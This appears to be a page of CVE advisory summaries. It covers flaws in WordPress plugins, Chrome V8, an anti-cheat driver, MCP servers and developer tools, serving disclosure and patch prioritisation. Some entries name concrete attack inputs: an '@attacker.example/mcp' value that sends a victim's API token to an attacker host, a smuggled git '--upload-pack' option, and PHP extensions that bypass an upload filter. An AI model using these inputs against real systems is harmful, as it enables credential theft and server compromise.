Local privilege escalation in Little Orbit's GameFirst Anti-Cheat (GFAC) lets a low-privileged user reach SYSTEM and run arbitrary code in kernel mode by sending crafted messages to the GFAC_Sys_x64.sys minifilter communication port. All GameFirst Anti-Cheat builds up to and including the 2025-07-07 release are affected, and a public GitHub repository covering this CVE alongside two sibling flaws indicates exploit material is available. There is no public exploit identified as being actively used, but the CERT/CC coordination and shared PoC repository make weaponization plausible.
Arbitrary file upload leading to remote code execution in the Divi Form Builder WordPress plugin (versions through 5.1.8) lets unauthenticated attackers upload executable PHP files and run arbitrary code on the server. Attacker-controlled input from the acceptFileTypes POST parameter is interpolated directly into the file-validation regex in do_image_upload(), allowing alternate PHP extensions (.phtml, .phar, .php5, .php7) that evade the plugin's .php-only .htaccess block - and on Nginx the .htaccess protection does not apply at all. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the CVSS 9.8 rating and Wordfence's technical disclosure make this a high-priority patching target.
Unauthenticated remote code execution affects Creative Themes' Blocksy Companion Pro WordPress plugin in all versions up to and including 2.1.46, allowing remote attackers to inject and execute arbitrary code (CWE-94) without any authentication or user interaction. Rated CVSS 10.0 with a scope-changed vector, this is a maximum-severity flaw reported by Patchstack. No public exploit identified at time of analysis and it is not currently listed in CISA KEV, but the trivial exploitability of an unauthenticated RCE makes it a high-priority patching target.
Unauthenticated arbitrary code execution affects the W3 Total Cache WordPress caching plugin in all versions up to and including 2.9.4, allowing remote attackers to execute code and fully compromise the underlying site without credentials or user interaction. The scope-changing CVSS 9.0 (Critical) rating reflects the plugin's deep hooks into WordPress request handling. There is no public exploit identified at time of analysis and no CISA KEV listing, though the high exploitability of a widely deployed plugin makes it a strong patching priority.
Remote code execution in the Five Star Business Profile and Schema WordPress plugin (versions up to and including 2.3.19) allows an attacker holding an Editor-level or higher account to inject and execute arbitrary PHP code on the host. Reported by Patchstack and rated CVSS 9.1 due to its scope-changing impact, the flaw turns a trusted content role into full server compromise. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CWE-94 code-injection root cause makes reliable exploitation straightforward for any authorized high-privilege user.
Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.
Unauthenticated code injection in the Request a Quote plugin for WordPress (versions up to and including 2.5.5) lets remote attackers invoke arbitrary zero-argument PHP functions on the server through the emd_delete_file AJAX action. Because the handler is registered for wp_ajax_nopriv and derives a callable function name from the attacker-controlled $_POST['path'] parameter, an attacker can trigger functions such as phpinfo() to expose server configuration and credentials, or destructive built-in functions. No public exploit identified at time of analysis, but the nonce that is the sole gatekeeper is printed directly into the public quote-form page, effectively neutralizing it.
Out-of-bounds array access in GeoVision's GeoWebPlayer addon (also branded 'Web Plugin' in GV-VMS and 'WS Player' in VMS-Cloud) can lead to remote code execution when the addon's localhost WebSocket server processes a saveVideo command with an attacker-controlled index. Because the addon ships with widely-used GeoVision products (GV-VMS, GV-Cloud) and is reachable from a victim's browser via a malicious web page, a lured user visiting attacker-controlled content can trigger an out-of-bounds function-pointer call. This is a Talos-reported (TALOS-2026-2373) issue with no public exploit identified at time of analysis and is not listed in CISA KEV.
Authenticated remote code execution in Craft CMS 5.9.0 through 5.9.x allows control panel users with entry-editing permissions to inject unsandboxed Twig code via the HTTP Referer header during entry save operations. Because the signed redirect URL derived from the attacker-controlled Referer is compiled with renderObjectTemplate() instead of the sandboxed renderSandboxedObjectTemplate(), a low-privileged CMS operator can achieve server-side template injection leading to code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw is fixed in Craft CMS 5.10.0.
Privilege-escalating remote code execution in the Git Service shared by Altium Enterprise Server and Altium 365 lets an authenticated user with basic git access abuse post-clone file-manipulation operations to move arbitrary files outside the repository, plant executable script content, and run code as the Git Service account. On multi-tenant Altium 365 cloud nodes this also created a cross-tenant data-exposure path. No public exploit identified at time of analysis; the CVSS 4.0 score of 9.4 (Critical) reflects full confidentiality, integrity and availability impact with only low privileges required.
Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use-after-free in Chrome's V8 JavaScript engine (versions before 150.0.7871.46) lets a remote attacker achieve arbitrary code execution inside the renderer sandbox by luring a victim to a crafted HTML page. Chromium rated this Medium severity, but the CVSS 8.8 reflects high confidentiality, integrity, and availability impact requiring only a single user click; there is no public exploit identified at time of analysis and CISA's SSVC framework records no known exploitation. Because scope is unchanged (S:U), code execution is confined to the sandbox and does not by itself constitute a full host compromise.
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows an attacker to run arbitrary code inside the renderer sandbox when a victim visits a crafted HTML page. The flaw is a use-after-free (CWE-416) reported by Google's own Chrome team; Chromium rated it Medium severity while NVD assigns CVSS 8.8. No public exploit has been identified at time of analysis, and CISA's SSVC framework records exploitation status as 'none'.
Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)
Arbitrary code execution within the renderer sandbox in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) can be triggered when a victim loads a crafted HTML page. The flaw stems from use of uninitialized memory in V8 and, while carrying a high CVSS base score of 9.6, was rated only Low severity by Chromium because code execution is confined inside the renderer sandbox and still requires a separate sandbox escape for full host compromise. No public exploit identified at time of analysis, and CISA's SSVC framework marks exploitation status as none.
Remote code execution in Google Chrome's V8 JavaScript engine (all channels prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is a CWE-843 type-confusion bug rated High by Chromium and CVSS 8.8; there is no public exploit identified at time of analysis and CISA's SSVC framework marks exploitation status as none. Because CVSS is AV:N/PR:N with UI:R, exploitation is unauthenticated but requires the victim to open a malicious page.
Out of bounds write in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is an integer overflow in V8, rated High by Chromium and scored CVSS 8.8; exploitation requires user interaction (visiting a malicious page) but no authentication. There is no public exploit identified at time of analysis, and CISA SSVC records exploitation status as none, indicating no observed in-the-wild activity yet.
Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)
Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)
Remote code execution in the V8 JavaScript engine of Google Chrome before 150.0.7871.46 allows a remote attacker who lures a victim to a crafted HTML page to execute arbitrary code — though notably only within the renderer sandbox rather than achieving full host compromise. Rated CVSS 8.8 and stemming from a code-generation flaw (CWE-94) in V8, it affects all Chrome desktop installations on the vulnerable channel; a fix has shipped, but there is no public exploit identified at time of analysis and CISA SSVC records exploitation status as none.
SQL injection in the UTT nv518G security gateway (firmware nv518GV3v3.2.7-210919-161313) lets remote attackers inject arbitrary SQL through the gohead/sub_463bbc component, which per the advisory escalates to arbitrary code execution on the device. The flaw is unauthenticated (CVSS 9.8, PR:N) and publicly available exploit code exists via a GitHub write-up, though it is not listed in CISA KEV; EPSS is low at 0.27% (18th percentile), indicating no evidence of widespread automated exploitation yet.
Apify API token exfiltration in @apify/actors-mcp-server 0.10.7 lets a remote attacker steal a victim's bearer credential via URL authority injection (CWE-918/SSRF). Because getActorMCPServerURL() naively concatenates a trusted standby base URL with an attacker-controlled webServerMcpPath from an Actor definition, an Actor published with a value like '@attacker.example/mcp' causes the WHATWG URL parser to resolve the outbound connection to the attacker's host, and connectMCPClient() unconditionally forwards the victim's 'Authorization: Bearer <APIFY_TOKEN>' header there. Publicly available exploit code exists (a Docker-based PoC that captures the token on an attacker HTTPS server); no active exploitation is confirmed.
Arbitrary code execution in Amazon's AWS Advanced JDBC Wrapper (versions 3.3.0 through 4.0.0) arises from the RemoteQueryCachePlugin deserializing cached query results from Redis or Valkey via a raw ObjectInputStream with no class filtering. An actor able to write to the shared cache can poison entries with a crafted serialized Java object, triggering gadget-chain execution on every application server that later reads that cache entry. No public exploit identified at time of analysis; risk is elevated because a single poisoned cache key fans out to all consuming app servers.
Reachable code execution in the Ladybird browser arises from a dangling-reference flaw (CWE-825) in the WebAssembly ESM-integration module loader, where a stack-local Wasm::FunctionType is captured by reference and read after destruction. A malicious web page can chain the resulting stale result-type data into an arbitrary write via the WASM-GC array.set handler and gain code execution in the WebContent process. Reported by VulnCheck with publicly available exploit code exists; it is not listed in CISA KEV, so no confirmed active exploitation, but a working PoC lowers the barrier for weaponization.
Arbitrary command execution in repomix (npm package, versions < 1.14.1) arises from argument injection in the `--remote-branch` CLI option, whose value is passed unsanitized into `git fetch` and `git checkout` subprocesses within `src/core/git/gitCommand.ts`. Because the branch value is not prefixed with a `--` positional delimiter and skips the `dangerousParams` blocklist that `validateGitUrl()` applies only to the URL, an attacker can inject options such as `--upload-pack` and, combined with an SSH or `file://` remote, execute an arbitrary payload binary with the invoking user's privileges. Publicly available exploit code exists, no active exploitation is confirmed (not in CISA KEV), and the flaw is fixed in v1.14.1.
Local arbitrary code execution in the Cortex MCP server (neuro-cortex-memory ≥ 3.17.0) lets an attacker run Python with the victim's user privileges when the open_visualization tool trusts the Claude Code-supplied CLAUDE_PROJECT_DIR as a Cortex developer checkout. Any project a victim opens is treated as a candidate source root, and validation only checks for two trivial marker files (mcp_server/ and ui/unified-viz.html) before executing an attacker-supplied visualize_bootstrap.py via subprocess. A working PoC is included in the advisory; there is no evidence of active exploitation, and the issue is fixed in v3.17.1.
SSRF policy bypass in jshookmcp 0.3.1 allows an authenticated MCP client with network domain access to probe internal RFC 1918 and reserved addresses that are explicitly blocked by all other network tools on the same server. The `network_icmp_probe` and `network_traceroute` handlers call `resolveHostname` directly without invoking the central `resolveAuthorizedTransportTarget` guard, creating an inconsistent enforcement boundary. No CISA KEV listing exists, but proof-of-concept test code demonstrating the bypass via the `handleCallTool` dispatch path is included in the GitHub advisory (GHSA-c5r6-m4mr-8q5j), confirming exploitability without external traffic.
Quick Facts
- Typical Severity
- CRITICAL
- Category
- other
- Total CVEs
- 31864